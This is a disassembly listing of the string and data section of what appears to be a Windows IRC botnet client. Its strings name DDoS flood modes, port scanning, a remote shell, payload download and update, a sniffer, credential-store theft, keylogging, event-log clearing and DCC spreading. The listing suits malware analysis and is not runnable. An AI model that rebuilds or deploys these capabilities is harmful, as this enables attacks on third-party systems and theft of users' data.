aSSpyalertLogin db '%s SpyAlert: Login Attempt -> [%s!%s@%s] -> (Tried Pass: "%s")',0
; DATA XREF: sub_419B2F+1F2�o
align 10h
aSS_5 db '%s [%s] ~',0
align 4
aSILoggedOut db '%s [%i] logged out',0
align 10h
aSNoUserLoggedA db '%s No user logged at slot: [%i]',0
aSInvalidLoginS db '%s Invalid login slot: [%i]',0
aSStoppedDThrea db '%s Stopped: [%d] thread(s)',0 ; DATA XREF: sub_403B2C+9D2�o
align 4
aSNoThreadSFoun db '%s No thread(s) found',0 ; DATA XREF: sub_403B2C:loc_40452E�o
align 10h
aSKilledThreadS db '%s Killed thread: [%s]',0 ; DATA XREF: sub_403B2C+A35�o
; sub_403B2C+A56�o
align 4
aSFailedToKillT db '%s Failed to kill thread: [%s]',0 ; DATA XREF: sub_403B2C+A70�o
; sub_403B2C+A91�o
align 4
aSSAlreadyRunni db '%s %s Already running at thread number: [%d]',0
; DATA XREF: sub_403B2C+AB3�o
; sub_403B2C+C26�o ...
align 4
aSFailedToStart db '%s Failed to start [%s], error: [%d]',0 ; DATA XREF: sub_403B2C+B97�o
; sub_403B2C+E77�o ...
align 10h
aSBoxSUpSBotupS db '%s Box: [%s], Up: [%s], BotUp: [%s], Connected For: [%s]',0
align 4
aS_6 db '[%s] ~',0 ; DATA XREF: sub_403B2C+274�o
align 4
aRemoveCmdRecei db 'Remove cmd received: [%s!%s@root]',0 ; DATA XREF: sub_403B2C+853�o
align 4
aUpdateCmdRecei db 'Update cmd received: [%s!%s@root]',0 ; DATA XREF: sub_40CDE2+625�o
align 4
aSMainThread db '%s Main thread',0 ; DATA XREF: sub_412267+39�o
align 4
aSAutosecure db '%s AutoSecure',0 ; DATA XREF: sub_412267+EF�o
align 4
aSMissingParamS db '%s Missing param(s)',0 ; DATA XREF: sub_403B2C+693�o
; sub_403B2C+15E3�o ...
aSS_ db '%s %s.',0 ; DATA XREF: sub_403B2C+7338�o
; sub_4177A2+56�o
align 4
aUnsecure db 'Unsecure',0 ; DATA XREF: sub_403B2C+732C�o
; sub_403B2C+73B6�o ...
align 4
off_434A64 dd offset byte_636553 ; DATA XREF: sub_403B2C+72AF�o
aSNoSubnetCla_0 db '%s No subnet class specified',0 ; DATA XREF: sub_403B2C:loc_40AD5A�o
align 4
aSNoIpSpecifi_0 db '%s No IP specified',0 ; DATA XREF: sub_403B2C:loc_40AD53�o
align 10h
aSSPortscanSt_0 db '%s %s PortScan started on %s:%d with a delay of %d seconds for %d'
; DATA XREF: sub_403B2C+70CB�o
; sub_403B2C+71BF�o ...
db ' minutes using %d threads',0
align 4
aSPortInvalid_ db '%s Port invalid.',0 ; DATA XREF: sub_403B2C+6DFA�o
align 10h
aSInvalidPort_ db '%s Invalid port.',0 ; DATA XREF: sub_403B2C+6DDC�o
align 4
aSFailedToSta_4 db '%s Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_403B2C+6A71�o
; sub_403B2C+6A92�o
align 4
aSSSDForDSecs_ db '%s %s --> (%s:%d) for %d secs.',0 ; DATA XREF: sub_403B2C+6A15�o
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_403B2C+69F2�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_403B2C+69EB�o
aTcpThreads db 'Tcp Threads',0 ; DATA XREF: sub_403B2C+692E�o
; sub_403B2C+6950�o
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_403B2C+67DC�o
db 'Referer: %s',0Dh,0Ah
db 'User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; .N'
db 'ET CLR 1.1.4322)',0Dh,0Ah
db 'Host: %s',0Dh,0Ah
db 'Connection: Keep-Alive',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aSSocketError_ db '%s Socket Error.',0 ; DATA XREF: sub_403B2C+675E�o
; sub_403B2C+6839�o
align 4
aSStopped_ db '%s Stopped.',0 ; DATA XREF: sub_403B2C+6700�o
aIexplore_exe db 'iexplore.exe',0 ; DATA XREF: sub_403B2C+66F5�o
; .text:0043F714�o
align 4
aSSiteFailedToO db '%s Site failed to open.',0 ; DATA XREF: sub_403B2C+66C0�o
; sub_403B2C+66DD�o
aSSiteOpened_ db '%s Site opened.',0 ; DATA XREF: sub_403B2C+6686�o
aOpen db 'open',0 ; DATA XREF: sub_403B2C+666D�o
; sub_414810+3B�o ...
align 4
aIexplore db 'iexplore',0 ; DATA XREF: sub_403B2C+6668�o
align 4
aVisit db 'Visit',0 ; DATA XREF: sub_403B2C+6622�o
align 4
aSS__0 db '%s --> (%s).',0 ; DATA XREF: sub_403B2C+6580�o
; sub_403B2C+659D�o ...
align 4
aVisitThreads db 'Visit Threads',0 ; DATA XREF: sub_403B2C+6501�o
align 4
aVisitthreads db 'VisitThreads',0 ; DATA XREF: sub_403B2C+64DF�o
align 4
off_434CCC dd offset byte_504455 ; DATA XREF: sub_403B2C+62DF�o
aSSendingDToSPa db '%s Sending %d to: %s, Packet size: %d, Delay: %dms.',0
; DATA XREF: sub_403B2C+6254�o
aSFailedToSta_3 db '%s Failed to start thread,error: <%d>.',0 ; DATA XREF: sub_403B2C+6213�o
; sub_403B2C+6236�o
align 4
aUdpThreads db 'UDP Threads',0 ; DATA XREF: sub_403B2C+60C3�o
; sub_403B2C+60E5�o
aHttpf db 'HTTPF',0 ; DATA XREF: sub_403B2C+6049�o
align 10h
aSSDDPackets_ db '%s --> (%s:%d) %d packets.',0 ; DATA XREF: sub_403B2C+5F70�o
; sub_403B2C+5FA1�o ...
align 4
aSNoDelay_ db '%s No delay.',0 ; DATA XREF: sub_403B2C:loc_409A6E�o
align 4
aHttpfThreads db 'HTTPF Threads',0 ; DATA XREF: sub_403B2C+5E75�o
; sub_403B2C+5E97�o
align 4
aTarga db 'Targa',0 ; DATA XREF: sub_403B2C+5E02�o
align 4
aSSDForDSecSWit db '%s --> (%s:%d) for %d sec',27h,'s with %d delay.',0
; DATA XREF: sub_403B2C+5D15�o
; sub_403B2C+5D50�o ...
align 10h
aTargaThreads db 'Targa Threads',0 ; DATA XREF: sub_403B2C+5C2E�o
; sub_403B2C+5C50�o
align 10h
aTaipan db 'TaiPan',0 ; DATA XREF: sub_403B2C+5BC4�o
align 4
aSSForDSecS db '%s --> (%s) for %d sec',27h,'s',0 ; DATA XREF: sub_403B2C+5B46�o
align 4
aSSDForDSecS db '%s --> (%s:%d) for %d sec',27h,'s',0 ; DATA XREF: sub_403B2C+5AEB�o
; sub_403B2C+5B1C�o
aTaipanThreads db 'Taipan Threads',0 ; DATA XREF: sub_403B2C+5A0E�o
; sub_403B2C+5A30�o
align 10h
aIgmp db 'IGMP',0 ; DATA XREF: sub_403B2C+59A4�o
align 4
aIgmpThreads db 'IGMP Threads',0 ; DATA XREF: sub_403B2C+5805�o
; sub_403B2C+5827�o
align 4
aKdos db 'KDOS',0 ; DATA XREF: sub_403B2C+579B�o
align 10h
aSFailedToSta_2 db '%s Failed to start thread, error: (%d)',0 ; DATA XREF: sub_403B2C+573E�o
; sub_403B2C+575F�o
align 4
aKdosThreads db 'KDOS Threads',0 ; DATA XREF: sub_403B2C+55C2�o
; sub_403B2C+55E4�o
align 4
aSFailedToSta_1 db '%s Failed to start thread, error: (%d).',0 ; DATA XREF: sub_403B2C+51C1�o
aSSDForDSecs_ db '%s --> (%s:%d) for (%d secs).',0 ; DATA XREF: sub_403B2C+511C�o
; sub_403B2C+514D�o ...
align 10h
aTcp db 'Tcp',0 ; DATA XREF: sub_403B2C+502B�o
aSFailedToWri_0 db '%s Failed to write: %s\%s\%s (%s)',0 ; DATA XREF: sub_403B2C+4F57�o
; sub_403B2C+4F81�o
align 4
aSWroteKeySSSS db '%s Wrote key: %s\%s\%s (%s)',0 ; DATA XREF: sub_403B2C+4F00�o
; sub_403B2C+4F2A�o
aSFailedToWrite db '%s Failed to write: %s\%s\%s (%d)',0 ; DATA XREF: sub_403B2C+4E82�o
; sub_403B2C+4EB2�o
align 4
aSSuccessfullyW db '%s Successfully wrote: %s\%s\%s (%d)',0 ; DATA XREF: sub_403B2C+4E2C�o
; sub_403B2C+4E5C�o
align 10h
aSQuerySSSS db '%s Query: %s\%s\%s: %s',0 ; DATA XREF: sub_403B2C+4CC5�o
align 4
aSFinishedDispl db '%s Finished displaying: %s\%s\%s',0 ; DATA XREF: sub_403B2C+4C85�o
; sub_403B2C+4CAC�o
align 4
aSDisplayingSSS db '%s Displaying: %s\%s\%s',0 ; DATA XREF: sub_403B2C+4BC8�o
; sub_403B2C+4BEB�o
aSFailedToQue_0 db '%s Failed to query: %s\%s\%s',0 ; DATA XREF: sub_403B2C+4B76�o
; sub_403B2C+4CE1�o
align 4
aSQuerySSSD db '%s Query: %s\%s\%s: %d',0 ; DATA XREF: sub_403B2C+4B4D�o
align 4
aSFailedToQuery db '%s Failed to query: %s\%s',0 ; DATA XREF: sub_403B2C:loc_408577�o
align 4
aSDoneWithQuery db '%s Done with query: %s\%s',0 ; DATA XREF: sub_403B2C+4A44�o
align 4
aSFailedToErase db '%s Failed to erase key: %s\%s\%s',0 ; DATA XREF: sub_403B2C+49CD�o
; sub_403B2C+49F8�o
align 4
aSErasedKeySSS db '%s Erased Key: %s\%s\%s',0 ; DATA XREF: sub_403B2C+497E�o
; sub_403B2C+49A9�o
aSFailedToSta_0 db '%s Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_403B2C+4698�o
; sub_403B2C+46B9�o ...
align 10h
aSSPortscanStar db '%s %s PortScan started on %s:%d with a delay of %d seconds for %d'
; DATA XREF: sub_403B2C+4628�o
db ' minutes using %d threads.',0
aSequential db 'Sequential',0 ; DATA XREF: sub_403B2C+4612�o
; sub_403B2C+46F6�o ...
align 4
aRandom db 'Random',0 ; DATA XREF: sub_403B2C+460B�o
; sub_403B2C+46EF�o ...
align 10h
aSNoSubnetClass db '%s No subnet class specified.',0 ; DATA XREF: sub_403B2C+4529�o
align 10h
aSNoIpSpecified db '%s No IP specified.',0 ; DATA XREF: sub_403B2C+443B�o
aD_x_x_x db '%d.x.x.x',0 ; DATA XREF: sub_403B2C+43B9�o
; sub_403B2C+6E50�o
align 10h
aX_x_x_x db 'x.x.x.x',0 ; DATA XREF: sub_403B2C+4386�o
; sub_403B2C+6E1D�o
aSInvalidPort db '%s Invalid port',0 ; DATA XREF: sub_403B2C+4370�o
aSDownloading_0 db '%s Downloading update',0 ; DATA XREF: sub_403B2C+416A�o
align 10h
aSDownloadingUp db '%s Downloading update to: (%s)',0 ; DATA XREF: sub_403B2C+40CB�o
align 10h
aSmsoftDDDDD_ex db '%smsoft%d%d%d%d%d.exe',0 ; DATA XREF: sub_403B2C+4035�o
align 4
aSDownload db '%s Download',0 ; DATA XREF: sub_403B2C+3F3A�o
aSDownloadingTo db '%s Downloading to: %s.',0 ; DATA XREF: sub_403B2C+3E9B�o
align 4
aSCommandsS_ db '%s Commands: %s.',0 ; DATA XREF: sub_403B2C+3D5A�o
align 10h
aSErrorSendingT db '%s Error sending to shell.',0 ; DATA XREF: sub_403B2C+3D4C�o
align 4
aSShellReady_ db '%s Shell ready.',0 ; DATA XREF: sub_403B2C+3C7D�o
; sub_403B2C+3C9B�o
aSCouldnTOpenSh db '%s Couldn',27h,'t open shell.',0 ; DATA XREF: sub_403B2C+3C3B�o
aSRemoteShellRu db '%s Remote shell running.',0 ; DATA XREF: sub_403B2C+3BEC�o
align 10h
aSSystemcallSen db '%s SystemCall sent: "%s"',0 ; DATA XREF: sub_403B2C+3B74�o
align 4
aSSystemcallFai db '%s SystemCall failed.',0 ; DATA XREF: sub_403B2C+3B57�o
align 4
aSUnloaded_ db '%s Unloaded.',0 ; DATA XREF: sub_403B2C+3AA5�o
align 4
aSNickservDrop db '%s nickserv drop',0 ; DATA XREF: sub_403B2C+3A72�o
align 4
aSNickservRegis db '%s nickserv :register pass103 %s',0 ; DATA XREF: sub_403B2C+3A3A�o
align 4
aS@S_com db '%s@%s.com',0 ; DATA XREF: sub_403B2C+3A1D�o
align 4
aSMemoservSendS db '%s memoserv :send %s %s',0 ; DATA XREF: sub_403B2C+39D1�o
dword_4352C0 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 73252220h
; DATA XREF: sub_403B2C+3385�o
dd 31322022h, 30373033h, 33333436h, 1642520h, 0
aAAAAAAAAAAAAAA db 'a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a'
; DATA XREF: sub_403B2C+3372�o
db ' a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a '
db 'a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a'
db ' a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a '
db 'a a a a',0
aSSDccSendCS db '%s %s :DCC SEND C:\\\\%s',0 ; DATA XREF: sub_403B2C+32E4�o
align 10h
dword_435410 dd 25207325h, 23A2073h, 25323103h, 73250373h, 25323103h
; DATA XREF: sub_403B2C+32C4�o
dd 20373h
dword_435428 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 20732520h
; DATA XREF: sub_403B2C+3295�o
dd 30333132h, 34363037h, 25203333h, 164h
dword_43544C dd 25207325h, 13A2073h, 20434344h, 444E4553h, 2E642520h
; DATA XREF: sub_403B2C+3265�o
dd 20657865h, 63657845h, 6E697475h, 69662067h, 2520656Ch
dd 164h
dword_435478 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 2E642520h
; DATA XREF: sub_403B2C+322B�o
dd 20747874h, 6E65704Fh, 25206465h, 202C2064h, 64616572h
dd 2C676E69h, 706D6F63h, 6574656Ch, 202D2064h, 6F6C7075h
dd 63206461h, 6C706D6Fh, 21657465h, 1
dword_4354C4 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 576F5720h
; DATA XREF: sub_403B2C+31F1�o
dd 5F736569h, 69576F57h, 575F7365h, 6569576Fh, 31322073h
dd 30373033h, 33333436h, 1642520h, 2 dup(0)
dword_435500 dd 64250302h, 5964252Ch, 2C642503h, 34F6425h, 252C6425h
; DATA XREF: sub_403B2C+31C2�o
dd 3A05564h, 252C6425h, 25034864h, 64252C64h, 64250341h
dd 5664252Ch, 2C642503h, 0A0456425h, 2C642503h, 3426425h
dd 252C6425h, 25034564h, 64252C64h, 64250345h, 4E64252Ch
dd 642503A0h, 5064252Ch, 2C642503h, 3556425h, 252C6425h
dd 3A05464h, 252C6425h, 25034964h, 64252C64h, 2503A04Eh
dd 64252C64h, 64250354h, 4864252Ch, 2C642503h, 0A0456425h
dd 2C642503h, 63256425h, 2C642503h, 3576425h, 252C6425h
dd 2034E64h, 0
dword_4355A8 dd 69257325h, 0 dword_4355B0 dd 434F4E4Bh, 7325204Bh, 73253A20h, 0dword_4355C0 dd 25207325h, 73252073h, 0 ; sub_403B2C+2CA1�o
dword_4355CC dd 25207325h, 13A2073h, 474E4946h, 15245h ; sub_403B2C+29DF�o ...
dword_4355DC dd 25207325h, 13A2073h, 53524556h, 14E4F49h, 0 ; sub_403B2C+3776�o
dword_4355F0 dd 25207325h, 13A2073h, 474E4950h, 1 ; sub_403B2C+28EF�o ...
dword_435600 dd 25207325h, 13A2073h, 17325h, 0dword_435610 dd 64250302h, 5964252Ch, 2C642503h, 34F6425h, 252C6425h
; DATA XREF: sub_403B2C+27A0�o
dd 3A05564h, 252C6425h, 25034864h, 64252C64h, 64250341h
dd 5664252Ch, 2C642503h, 0A0456425h, 2C642503h, 3426425h
dd 252C6425h, 25034564h, 64252C64h, 64250345h, 4E64252Ch
dd 642503A0h, 5064252Ch, 2C642503h, 3556425h, 252C6425h
dd 3A05464h, 252C6425h, 25034964h, 64252C64h, 2503A04Eh
dd 64252C64h, 64250354h, 4864252Ch, 2C642503h, 0A0456425h
dd 2C642503h, 63256425h, 2C642503h, 3576425h, 252C6425h
dd 73204E64h, 74726174h, 79656B20h, 67676F6Ch, 2037265h
dd 0
dword_4356C8 dd 25207325h, 253A2073h, 73h ; sub_403B2C+27C0�o ...
aSLoadedOntoSDA db '%s Loaded Onto: (%s:%d), Amount: (%d)',0 ; DATA XREF: sub_403B2C+245A�o
; sub_403B2C+248F�o
align 4
aSTooMuchConns_ db '%s Too Much conns.',0 ; DATA XREF: sub_403B2C+2409�o
align 10h
aSConnectionClo db '%s Connection closed: (%i/%ikB sent).',0 ; DATA XREF: sub_403B2C+2371�o
align 4
aSTimedOutClosi db '%s Timed Out, closing connection.',0 ; DATA XREF: sub_403B2C+2270�o
align 4
aSDDI db '%s %d %d %i',0 ; DATA XREF: sub_403B2C+221F�o
aDccSendSS db 'DCC Send %s (%s)',0 ; DATA XREF: sub_403B2C+21E9�o
align 4
aSendingYouS db 'Sending you %s',0 ; DATA XREF: sub_403B2C+21C9�o
align 4
aSSocketError db '%s Socket Error',0 ; DATA XREF: sub_403B2C+2185�o
aSSocketBindErr db '%s Socket Bind Error',0 ; DATA XREF: sub_403B2C+214F�o
align 4
aSInvalidSocket db '%s Invalid Socket',0 ; DATA XREF: sub_403B2C+20FA�o
align 4
aSNoFile db '%s No file',0 ; DATA XREF: sub_403B2C+20CC�o
align 4
aDrives db 'Drives',0 ; DATA XREF: sub_403B2C+1FB0�o
; sub_403B2C+1FD6�o
align 4
aSDrives db '%s Drives',0 ; DATA XREF: sub_403B2C+1F52�o
align 4
aGb db 'GB',0 ; DATA XREF: sub_403B2C:loc_405A3D�o
; sub_4154DA:loc_415527�o ...
align 4
aMb db 'MB',0 ; DATA XREF: sub_403B2C+1EFF�o
; sub_4154DA+2C�o ...
align 10h
aKb db 'KB',0 ; DATA XREF: sub_403B2C+1EE7�o
; sub_4154DA+17�o ...
align 4
aDrivesList db 'Drives List',0 ; DATA XREF: sub_403B2C+1E0E�o
; sub_403B2C+1E30�o
aSObtainingExte db '%s Obtaining external IP',0 ; DATA XREF: sub_403B2C+1D26�o
; sub_403B2C+1D44�o
align 4
aSFailedToLoadD db '%s Failed to load dnsapi.dll.',0 ; DATA XREF: sub_403B2C+1CB3�o
align 4
aSFailedToFlu_0 db '%s Failed to flush DNS cache.',0 ; DATA XREF: sub_403B2C:loc_4057D0�o
align 4
aSDnsCacheFlush db '%s DNS cache flushed.',0 ; DATA XREF: sub_403B2C+1C9A�o
align 4
aSFailedToFlush db '%s Failed to flush ARP.',0 ; DATA XREF: sub_403B2C+1C6F�o
aSArpFlushed_ db '%s ARP flushed.',0 ; DATA XREF: sub_403B2C+1C64�o
aSSentIrcRawS_ db '%s Sent IRC raw: "%s".',0 ; DATA XREF: sub_403B2C+1C12�o
align 4
aSEftpdEnabledO db '%s EFTPD enabled on port: %i, thread number: %i.',0
; DATA XREF: sub_403B2C+1AC9�o
; sub_403B2C+1AF2�o
align 4
aEftpd db 'EFTPD',0 ; DATA XREF: sub_403B2C+1A69�o
; sub_403B2C+1A8F�o
align 10h
aSServerStarted db '%s Server started on Port: %i, File: %s.',0
; DATA XREF: sub_403B2C+19FD�o
align 10h
aSEftpdRunningO db '%s EFTPD running on port: %i, thread number: %i, Total sends: %i.'
; DATA XREF: sub_403B2C+1935�o
; sub_403B2C+1961�o
db 0
align 4
aSCreateProcess db '%s Create process thread.',0 ; DATA XREF: sub_403B2C+1819�o
align 10h
aSProcs db '%s Procs',0 ; DATA XREF: sub_403B2C+1714�o
align 4
aBkill db 'BKill',0 ; DATA XREF: sub_403B2C+1586�o
; sub_403B2C+15AC�o
align 4
aSBkillStarted db '%s BKill Started',0 ; DATA XREF: sub_403B2C+150B�o
align 4
aSBkillThread_ db '%s BKill thread.',0 ; DATA XREF: sub_403B2C+14F2�o
align 4
aSUptimeS db '%s UPTime: (%s)',0 ; DATA XREF: sub_403B2C+143B�o
aSSSS db '%s %s (%s) %s',0 ; DATA XREF: sub_403B2C+13D4�o
; sub_403B2C+13FD�o
align 4
a_BuiltJun10200 db '. Built: Jun 10 2008.',0 ; DATA XREF: sub_403B2C+13B8�o
; sub_403B2C+13E1�o
align 4
aSRunningOnSI db '%s Running on: [%s:%i]',0 ; DATA XREF: sub_403B2C+12A4�o
; sub_403B2C+135B�o ...
align 4
aSPatcherStarte db '%s Patcher Started',0 ; DATA XREF: sub_403B2C+11ED�o
align 10h
aPatcher db 'Patcher',0 ; DATA XREF: sub_403B2C+11A8�o
; sub_403B2C+11CE�o
aSPatcherThread db '%s Patcher thread.',0 ; DATA XREF: sub_403B2C+1148�o
align 4
aSPstore db '%s PStore',0 ; DATA XREF: sub_403B2C+E41�o
align 4
aPstore db 'PStore',0 ; DATA XREF: sub_403B2C+DA0�o
; sub_403B2C+EA1�o ...
align 10h
aSStarted_ db '%s started.',0 ; DATA XREF: sub_403B2C+CF5�o
aSSniffer_ db '%s Sniffer.',0 ; DATA XREF: sub_403B2C+C90�o
aSniffer_ db 'Sniffer.',0 ; DATA XREF: sub_403B2C+C39�o
; sub_403B2C+C5B�o
align 4
aSThreadList db '%s Thread list',0 ; DATA XREF: sub_403B2C+B4D�o
align 4
aThreadList_0 db 'Thread list',0 ; DATA XREF: sub_403B2C+AC1�o
; sub_403B2C+BAB�o ...
aSAdvapi_dllNot db '%s Advapi.dll not loaded',0 ; DATA XREF: sub_403B2C+970�o
; sub_415DBD+71�o
align 4
aSFailedToClear db '%s Failed to clear syslogs',0 ; DATA XREF: sub_403B2C+961�o
align 4
aSClearedDDSysl db '%s Cleared [%d/%d] syslogs',0 ; DATA XREF: sub_403B2C+94D�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_403B2C+8E6�o
align 4
aSecurity db 'security',0 ; DATA XREF: sub_403B2C+8DC�o
; .text:0043CC8C�o
align 4
aApplication db 'application',0 ; DATA XREF: sub_403B2C+8D2�o
asc_435B04: ; DATA XREF: sub_403B2C:loc_404375�o
; sub_403B2C+E19�o
unicode 0, <*>,0
a6 db '$6',0 ; DATA XREF: sub_403B2C+7A7�o
align 4
a5 db '$5',0 ; DATA XREF: sub_403B2C+793�o
align 10h
a4 db '$4',0 ; DATA XREF: sub_403B2C+77C�o
align 4
a3 db '$3',0 ; DATA XREF: sub_403B2C+768�o
align 4
a2 db '$2',0 ; DATA XREF: sub_403B2C+754�o
align 4
a1 db '$1',0 ; DATA XREF: sub_403B2C+740�o
align 10h
aChan db '$chan',0 ; DATA XREF: sub_403B2C+72C�o
align 4
aUser_1 db '$user',0 ; DATA XREF: sub_403B2C+716�o
align 10h
aMe_0 db '$me',0 ; DATA XREF: sub_403B2C+6F9�o
aCS db '%c%s',0 ; DATA XREF: sub_403B2C+6DC�o
align 4
aSAddedAliasS db '%s Added Alias: %s',0 ; DATA XREF: sub_403B2C+64F�o
align 10h
aS_0 db ' %s',0 ; DATA XREF: sub_403B2C+606�o
; sub_403B2C+1002�o ...
aS_1 db '%s',0 ; DATA XREF: sub_403B2C+5E2�o
; sub_403B2C+FDE�o ...
align 4
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_403B2C+559�o
aSAliasList db '%s [Alias list]',0 ; DATA XREF: sub_403B2C+504�o
aSServersListed db '%s Servers Listed',0 ; DATA XREF: sub_403B2C+4D3�o
align 4
aISDSS db '[%i: %s:%d%s,%s]',0 ; DATA XREF: sub_403B2C+4AB�o
align 4
aSServerList db '%s [Server List]:',0 ; DATA XREF: sub_403B2C+464�o
align 10h
aSCurrentServer db '%s: [Current Server]: [%i:%s:%d%s]',0 ; DATA XREF: sub_403B2C+436�o
align 4
aSsl db ' (SSL)',0 ; DATA XREF: sub_403B2C+405�o
; sub_403B2C+48D�o
align 4
asc_435BDC db '";',0 ; DATA XREF: sub_403B2C+3B0�o
align 10h
aX2_2x db '\x%2.2X',0 ; DATA XREF: sub_403B2C+322�o
aSCipherText db '%s (Cipher text): "',0 ; DATA XREF: sub_403B2C+2FD�o
aSecure db 'Secure',0 ; DATA XREF: sub_403B2C:loc_403D77�o
; sub_403B2C+7325�o ...
align 4
aStopped_ db 'Stopped.',0 ; DATA XREF: sub_403B2C:loc_403D6B�o
; sub_403B2C+423E�o ...
align 10h
off_435C10 dd offset byte_444D43 ; DATA XREF: sub_403B2C:loc_403D5F�o
; sub_403B2C+3DA0�o
dword_435C14 dd 3453h ; sub_403B2C+122E�o ...
aUpdate db 'Update',0 ; DATA XREF: sub_403B2C+1F4�o
; sub_403B2C+3FB7�o ...
align 10h
aDownload db 'Download',0 ; DATA XREF: sub_403B2C+1E0�o
; sub_403B2C+3DF5�o ...
align 4
aDriveList db 'Drive list',0 ; DATA XREF: sub_403B2C+125�o
align 4
aProcs db 'Procs',0 ; DATA XREF: sub_403B2C+BE�o
; sub_403B2C+1663�o ...
align 10h
aSniffer db 'Sniffer',0 ; DATA XREF: sub_403B2C+A8�o
; sub_403B2C+D4B�o
aThreadList db 'Thread List',0 ; DATA XREF: sub_403B2C+58�o
align 8
byte_435C58 db 1 ; DATA XREF: sub_40AF5C+25�r
align 2
dw 2
dd 80004h, 200010h, 800040h
dword_435C68 dd 800000h, 400000h, 200000h, 100000h, 80000h, 40000h
; DATA XREF: sub_40AF5C+C6�r
; sub_40AF5C+D8�r
dd 20000h, 10000h, 8000h, 4000h, 2000h, 1000h, 800h, 400h
dd 200h, 100h, 80h, 40h, 20h, 10h, 8, 4, 2, 1
byte_435CC8 db 38h ; DATA XREF: sub_40AF5C:loc_40AF6C�r
db 30h, 28h, 20h
dd 81018h, 21293139h, 1091119h, 222A323Ah, 20A121Ah, 232B333Bh
dd 262E363Eh, 60E161Eh, 252D353Dh, 50D151Dh, 242C343Ch
dd 40C141Ch, 30B131Bh
dword_435D00 dd 6040201h, 0E0C0A08h, 1513110Fh, 1C1B1917h, 170A100Dh
; DATA XREF: sub_40AF5C+6A�r
dd 1B020400h, 914050Eh, 30B1216h, 60F0719h, 10C131Ah
dword_435D28 dd 241E3328h, 271D362Eh, 2F202C32h, 3726302Bh, 292D3421h
; DATA XREF: sub_40AF5C:loc_40B012�r
dd 1F1C2331h
dword_435D40 dd 1010400h, 0 ; sub_40B1D8+148�r
dd 10000h, 1010404h, 1010004h, 10404h, 4, 10000h, 400h
dd 1010400h, 1010404h, 400h, 1000404h, 1010004h, 1000000h
dd 4, 404h, 2 dup(1000400h), 2 dup(10400h), 2 dup(1010000h)
dd 1000404h, 10004h, 2 dup(1000004h), 10004h, 0
dd 404h, 10404h, 1000000h, 10000h, 1010404h, 4, 1010000h
dd 1010400h, 2 dup(1000000h), 400h, 1010004h, 10000h, 10400h
dd 1000004h, 400h, 4, 1000404h, 10404h, 1010404h, 10004h
dd 1010000h, 1000404h, 1000004h, 404h, 10404h, 1010400h
dd 404h, 2 dup(1000400h), 0
dd 10004h, 10400h, 0
dd 1010004h
dword_435E40 dd 80108020h ; sub_40B1D8+189�r
dd 80008000h, 8000h, 108020h, 100000h, 20h, 80100020h
dd 80008020h, 80000020h, 80108020h, 80108000h, 80000000h
dd 80008000h, 100000h, 20h, 80100020h, 108000h, 100020h
dd 80008020h, 0
dd 80000000h, 8000h, 108020h, 80100000h, 100020h, 80000020h
dd 0
dd 108000h, 8020h, 80108000h, 80100000h, 8020h, 0
dd 108020h, 80100020h, 100000h, 80008020h, 80100000h, 80108000h
dd 8000h, 80100000h, 80008000h, 20h, 80108020h, 108020h
dd 20h, 8000h, 80000000h, 8020h, 80108000h, 100000h, 80000020h
dd 100020h, 80008020h, 80000020h, 100020h, 108000h, 0
dd 80008000h, 8020h, 80000000h, 80100020h, 80108020h, 108000h
dword_435F40 dd 208h ; sub_40B1D8+152�r
dd 8020200h, 0
dd 8020008h, 8000200h, 0
dd 20208h, 8000200h, 20008h, 2 dup(8000008h), 20000h, 8020208h
dd 20008h, 8020000h, 208h, 8000000h, 8, 8020200h, 200h
dd 20200h, 8020000h, 8020008h, 20208h, 8000208h, 20200h
dd 20000h, 8000208h, 8, 8020208h, 200h, 8000000h, 8020200h
dd 8000000h, 20008h, 208h, 20000h, 8020200h, 8000200h
dd 0
dd 200h, 20008h, 8020208h, 8000200h, 8000008h, 200h, 0
dd 8020008h, 8000208h, 20000h, 8000000h, 8020208h, 8, 20208h
dd 20200h, 8000008h, 8020000h, 8000208h, 208h, 8020000h
dd 20208h, 8, 8020008h, 20200h
dword_436040 dd 802001h ; sub_40B1D8+193�r
dd 2 dup(2081h), 80h, 802080h, 800081h, 800001h, 2001h
dd 0
dd 2 dup(802000h), 802081h, 81h, 0
dd 800080h, 800001h, 1, 2000h, 800000h, 802001h, 80h, 800000h
dd 2001h, 2080h, 800081h, 1, 2080h, 800080h, 2000h, 802080h
dd 802081h, 81h, 800080h, 800001h, 802000h, 802081h, 81h
dd 2 dup(0)
dd 802000h, 2080h, 800080h, 800081h, 1, 802001h, 2 dup(2081h)
dd 80h, 802081h, 81h, 1, 2000h, 800001h, 2001h, 802080h
dd 800081h, 2001h, 2080h, 800000h, 802001h, 80h, 800000h
dd 2000h, 802080h
dword_436140 dd 100h ; sub_40B1D8+164�r
dd 2080100h, 2080000h, 42000100h, 80000h, 100h, 40000000h
dd 2080000h, 40080100h, 80000h, 2000100h, 40080100h, 42000100h
dd 42080000h, 80100h, 40000000h, 2000000h, 2 dup(40080000h)
dd 0
dd 40000100h, 2 dup(42080100h), 2000100h, 42080000h, 40000100h
dd 0
dd 42000000h, 2080100h, 2000000h, 42000000h, 80100h, 80000h
dd 42000100h, 100h, 2000000h, 40000000h, 2080000h, 42000100h
dd 40080100h, 2000100h, 40000000h, 42080000h, 2080100h
dd 40080100h, 100h, 2000000h, 42080000h, 42080100h, 80100h
dd 42000000h, 42080100h, 2080000h, 0
dd 40080000h, 42000000h, 80100h, 2000100h, 40000100h, 80000h
dd 0
dd 40080000h, 2080100h, 40000100h
dword_436240 dd 20000010h ; sub_40B1D8+1A2�r
dd 20400000h, 4000h, 20404010h, 20400000h, 10h, 20404010h
